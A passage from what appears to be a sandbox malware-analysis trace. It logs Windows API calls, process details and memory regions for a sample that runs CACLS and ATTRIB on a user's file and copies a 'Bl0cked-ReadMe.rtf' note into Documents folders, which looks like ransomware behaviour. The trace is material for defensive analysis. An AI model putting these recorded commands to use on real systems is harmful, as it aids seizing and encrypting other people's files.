_wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0234.654] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0234.654] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0234.654] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0234.654] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0234.654] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0234.654] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0234.654] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0234.654] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0234.654] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0234.655] SetErrorMode (uMode=0x0) returned 0x0 [0234.655] SetErrorMode (uMode=0x1) returned 0x0 [0234.655] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x251db0, lpFilePart=0x18f304 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f304*="Desktop") returned 0x18 [0234.655] SetErrorMode (uMode=0x0) returned 0x1 [0234.655] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.655] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0234.660] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.661] FindClose (in: hFindFile=0x251f88 | out: hFindFile=0x251f88) returned 1 [0234.661] FindClose (in: hFindFile=0x251f88 | out: hFindFile=0x251f88) returned 1 [0234.661] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0234.661] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0234.661] GetConsoleTitleW (in: lpConsoleTitle=0x18f578, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.217] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f400, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f4c8 | out: lpAttributeList=0x18f400, lpSize=0x18f4c8) returned 1 [0235.218] UpdateProcThreadAttribute (in: lpAttributeList=0x18f400, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f4c0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f400, lpPreviousValue=0x0) returned 1 [0235.218] GetStartupInfoW (in: lpStartupInfo=0x18f3bc | out: lpStartupInfo=0x18f3bc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0235.218] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0235.219] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18f45c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f4a8 | out: lpCommandLine="CACLS \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x18f4a8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xf68, dwThreadId=0xd40)) returned 1 [0235.221] CloseHandle (hObject=0x4c) returned 1 [0235.221] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0235.221] GetEnvironmentStringsW () returned 0x250220* [0235.221] FreeEnvironmentStringsW (penv=0x250220) returned 1 [0235.221] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0235.518] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x18f39c | out: lpExitCode=0x18f39c*=0x0) returned 1 [0235.518] CloseHandle (hObject=0x50) returned 1 [0235.518] _vsnwprintf (in: _Buffer=0x18f4e4, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f3a8 | out: _Buffer="00000000") returned 8 [0235.518] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0235.518] GetEnvironmentStringsW () returned 0x252340* [0235.518] FreeEnvironmentStringsW (penv=0x252340) returned 1 [0235.518] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0235.518] GetEnvironmentStringsW () returned 0x252340* [0235.518] FreeEnvironmentStringsW (penv=0x252340) returned 1 [0235.518] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f400 | out: lpAttributeList=0x18f400) [0235.518] GetConsoleTitleW (in: lpConsoleTitle=0x18f7e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.518] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0235.519] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0235.519] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0235.519] FindClose (in: hFindFile=0x24e400 | out: hFindFile=0x24e400) returned 1 [0235.519] FindClose (in: hFindFile=0x24e400 | out: hFindFile=0x24e400) returned 1 [0235.519] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0235.519] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0235.519] GetConsoleTitleW (in: lpConsoleTitle=0x18f578, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.519] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f400, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f4c8 | out: lpAttributeList=0x18f400, lpSize=0x18f4c8) returned 1 [0235.519] UpdateProcThreadAttribute (in: lpAttributeList=0x18f400, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f4c0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f400, lpPreviousValue=0x0) returned 1 [0235.519] GetStartupInfoW (in: lpStartupInfo=0x18f3bc | out: lpStartupInfo=0x18f3bc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0235.519] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0235.519] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18f45c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f4a8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\"", lpProcessInformation=0x18f4a8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb74, dwThreadId=0xbbc)) returned 1 [0235.525] CloseHandle (hObject=0x50) returned 1 [0235.525] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0235.525] GetEnvironmentStringsW () returned 0x252340* [0235.525] FreeEnvironmentStringsW (penv=0x252340) returned 1 [0235.525] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0235.562] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x18f39c | out: lpExitCode=0x18f39c*=0x0) returned 1 [0235.562] CloseHandle (hObject=0x4c) returned 1 [0235.562] _vsnwprintf (in: _Buffer=0x18f4e4, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f3a8 | out: _Buffer="00000000") returned 8 [0235.562] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0235.562] GetEnvironmentStringsW () returned 0x252340* [0235.562] FreeEnvironmentStringsW (penv=0x252340) returned 1 [0235.562] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0235.562] GetEnvironmentStringsW () returned 0x252340* [0235.562] FreeEnvironmentStringsW (penv=0x252340) returned 1 [0235.562] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f400 | out: lpAttributeList=0x18f400) [0235.562] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.562] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.563] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.563] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.563] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.563] SetConsoleInputExeNameW () returned 0x1 [0235.563] GetConsoleOutputCP () returned 0x1b5 [0235.563] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.563] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.563] exit (_Code=0) Process: id = "643" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c20" os_pid = "0xf68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "642" os_parent_pid = "0x828" cmd_line = "CACLS \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35523 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35524 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35525 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35526 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 35527 start_va = 0x590000 end_va = 0x598fff entry_point = 0x590000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 35528 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35529 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35530 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35531 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 35532 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35533 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35534 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35535 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35536 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 35537 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 35538 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35539 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 35540 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35541 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 35542 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35543 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 35544 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 883 os_tid = 0xd40 Thread: id = 884 os_tid = 0xb0c Process: id = "644" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16c20" os_pid = "0xb74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "642" os_parent_pid = "0x828" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35545 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35546 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 35547 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 35548 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 35549 start_va = 0x560000 end_va = 0x566fff entry_point = 0x560000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 35550 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35551 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35552 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35553 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 35554 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35555 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35556 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35557 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35558 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 35559 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 35560 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 35561 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35562 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 35563 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35564 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35565 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 35566 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35567 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35568 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35569 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 35570 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35571 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35572 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 35573 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35574 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 885 os_tid = 0xbbc Process: id = "645" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xaac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35575 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35576 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35577 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35578 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 35579 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35580 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35581 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35582 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35583 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 35584 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35667 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35668 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35669 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35670 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 35671 start_va = 0x440000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 35672 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35673 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35674 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35675 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35676 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35677 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35678 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35679 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35680 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35681 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 35682 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35683 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35684 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35685 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 35686 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 35687 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename 